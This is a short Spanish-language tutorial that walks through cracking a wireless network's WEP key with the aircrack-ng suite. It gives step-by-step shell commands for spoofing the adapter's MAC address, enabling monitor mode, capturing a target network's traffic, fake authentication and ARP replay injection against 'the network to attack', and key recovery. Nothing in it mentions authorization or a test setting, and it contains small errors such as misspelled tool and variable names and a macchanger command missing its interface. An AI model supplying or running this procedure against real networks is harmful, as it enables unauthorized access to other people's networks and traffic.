Descifrar encriptado WEP con aircark-ng 1. Cambiar la dirección MAC del adaptador de red inalámbrico: # ifconfig wlan0 down # macchanger -m 00:11:22:33:44:55 # ifconfig wlan0 up 2. Habilitar el adaptador de red inalámbrico para monitoreo de paquetes: # airmon-ng start wlan0 3. Identificar las redes inalámbricas disponibles así como las MAC y canales de las mismas: # airodump-ng wlan0 4. Una vez identificadas las redes y canales disponibles, utilizar el filtro correspondiente para enfocarse únicamente en el canal deseado y guardar el registro de paquetes en un archivo: # airodump-ng -c (número de canal) -w (nombre del archivo .cap) wlan0 5. Conectar con la red inalámbrica y con el ruteador correspondiente utilizando una nueva solapa en la terminal: # aireplay-ng -1 0 -e (ESSID o nombre la red a atacar [en caso de que el nombre contenga espacios escribirlo entre comillas “”]) -a (MAC de la red a atacar o BSSID) -h (MAC propia establecida anteriormente en oo:11:22:33:44:55) wlan0 6. Acelerar el proceso de captura de paquetes: # aireplay-ng -3 -b (MAC de la red a atacar o BSSID) -h (MAC propia establecida anteriormente en oo:11:22:33:44:55) wlan0 7. Una vez capturados 150.000 paquetes en ARP se puede proceder al descifrado de la clave WEP utilizando una nueva solapa en la terminal: # aircrack-ng (nombre del archivo .cap)*.cap Este proceso es más lento # aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere más paquetes capturados. # aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta # aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por defecto es 128 y en 2wire 64 bits.